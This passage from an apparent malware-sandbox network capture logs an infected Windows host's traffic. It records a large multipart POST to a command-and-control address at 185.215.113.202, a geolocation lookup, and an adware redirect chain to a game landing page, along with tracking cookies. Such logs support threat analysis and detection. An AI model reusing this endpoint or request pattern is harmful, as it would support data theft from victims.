Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:33:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1Remote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----a121f13021cd9b14fed0a1dca5873d09
Host: 185.215.113.202
Content-Length: 65921
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:33:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSapi.ip.sbRemote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A104.26.13.31api.ip.sb.cdn.cloudflare.netIN A172.67.75.172api.ip.sb.cdn.cloudflare.netIN A104.26.12.31
-
GEThttps://api.ip.sb/geoipRemote address:104.26.13.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RCdVnB7CqLQmrJJmmdpE4DJqwSRapSi87VM9bFmZhVVXJNwt225J%2F33vZvgLwprLilJ5MD8zc9UF0%2FF6fyDs9y4noucUIs%2BlJLfhTdgTTTXdnl8520Gcr71eEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68a6b310af800121-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadRemote address:192.243.59.13:443RequestGET /b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; iprc4b0c6c85dad9ef7dd52a697b854a7c42=2903337; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1
ResponseHTTP/1.1 200 OK
Server: nginx/1.17.6
Date: Mon, 06 Sep 2021 09:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14575867,14576783; expires=Tue, 07 Sep 2021 09:34:16 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MiwiYXUiOjIsImQiOnsiaWQiOjE1NzYwMSwiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MjE0NjEsImJuIjoiSW50ZXJuZXQgRXhwbG9yZXIiLCJidiI6IjExLjAiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.MpAKNMirnCJbJLO1LF3JlBxly9kO5EzuMvFfHUscno8; expires=Mon, 06 Sep 2021 09:35:16 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: c6bebfdd7858f72e0189b11d6796c13b
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
-
GEThttps://www.profitabletrustednetwork.com/b1fsmdd9m?shu=7688577ea216eef62501967e4ddba1b72103245c15cb164eff517b4a445e2062d0e638af25719f80b561b15d5f1bba38ecaaf5274572c61b615f74bc3a7f84ecebe23869223e1978bb00606b59c93444c68dc8b2&pst=1630920916&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dadRemote address:192.243.59.13:443RequestGET /b1fsmdd9m?shu=7688577ea216eef62501967e4ddba1b72103245c15cb164eff517b4a445e2062d0e638af25719f80b561b15d5f1bba38ecaaf5274572c61b615f74bc3a7f84ecebe23869223e1978bb00606b59c93444c68dc8b2&pst=1630920916&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867,14576783; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MiwiYXUiOjIsImQiOnsiaWQiOjE1NzYwMSwiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MjE0NjEsImJuIjoiSW50ZXJuZXQgRXhwbG9yZXIiLCJidiI6IjExLjAiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.MpAKNMirnCJbJLO1LF3JlBxly9kO5EzuMvFfHUscno8; iprc4b0c6c85dad9ef7dd52a697b854a7c42=2903337; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1; cjs=t
ResponseHTTP/1.1 302 Found
Server: nginx/1.17.6
Date: Mon, 06 Sep 2021 09:34:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Set-Cookie: uncs=2; expires=Tue, 07 Sep 2021 09:34:22 GMT
Set-Cookie: uncs28=2; expires=Tue, 07 Sep 2021 09:34:22 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 6d2928231be94258088c3b104b65ffdb
Strict-Transport-Security: max-age=0; includeSubdomains
-
DNStheonlygames.comRemote address:8.8.8.8:53Requesttheonlygames.comIN AResponsetheonlygames.comIN A104.21.235.54theonlygames.comIN A104.21.235.53
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/libs/jquery.min.jsRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/libs/jquery.min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Thu, 15 Jul 2021 12:31:41 GMT
etag: W/"60f02aad-1538f"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 615
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hKw9yoNWLfo5skGzt69xIR2lC7nfFbRoS9uymYS5f86PovrZsiq0GbgpCk%2Bz%2BiLJ1VE074WzZ1%2BVlaCOkR2p2gAxn1xCH41jCTU3HpYMKfqfnxywvpOSgFG%2BmF9lFUj8%2FkiQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b7093c00e4-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/awpx_click.js?v=005Remote address:104.21.235.54:443RequestGET /awpx_click.js?v=005 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Thu, 15 Jul 2021 12:31:34 GMT
etag: W/"60f02aa6-5f7"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 1243
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EszFG4VVgwr672aJ8M%2BcE2FWCsdOtIq4zJ59HvYDpIyweGlPK%2Fsp2%2FYyWkA5zN8iBO%2FoKfIPmHMrwBdc5wYgYgextL5LMYlzYcl%2FlEVhc58AY616wpLqlTiPThqaxaleC2rw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b7398500e4-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color3.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_color3.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 112227
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-1b663"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 523
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HWOTJJoqYSR64zy5%2BbwVf6BJNxxzJQj0baTfbFrLBBbrm8E5L8SDkbALmWP8gHEN6kF72xlCj%2F3IJStxoLCdo62o%2BI4A1haW8nrIdjVh%2FmDo6L%2BT9y4boe7Hz8ksRWWvpg6T"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b7499900e4-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783Remote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Last-Modified: Mon, 06 Sep 2021 09:34:31 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q2JKSG1x0CatH9X0k%2FVnarlfz28%2F9gh5u9e%2BhOqpwncwAFGxBM6UsvRzYKncddSrhgXm6zjcsNxgYYNZAuE61m5YfmL5xYvSUe9GaqdoCNhzLanSKOrC1Zp3olGL1ZAAf82J"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b2fbe5fa44-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/css/main.cssRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/css/main.css HTTP/1.1
Accept: text/css, */*
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: W/"5f5657c1-ced"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 596
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B5V38Fy2shxeSw%2F6TzPROyeznmxqEwjNxCK0IxaQbZpYKZ2Nhib8OjdzF4YQP%2F7fRhnWtChKfxT5ZRRNddqg8YJCPNZ%2BqPNl8NopGcIFsRP5QL0UAFCIgMNnEzOIQqu0yoHx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b70fccfa44-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black3.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_black3.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 119299
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-1d203"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 578
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O%2Fnk%2BsU%2BFeDFmazMJ1FUc2HcfhjVi2RUA2zZZDjSNNrTzIRzKq93WGj4W%2F90uIE4fKrzgn2AiWAMXiTg62VlI5e9pdHAyMiyJwAGvtMJC0ZqQvIBNUN7qIXOxcK%2FGljOgpix"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b74802fa44-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/play.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/play.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
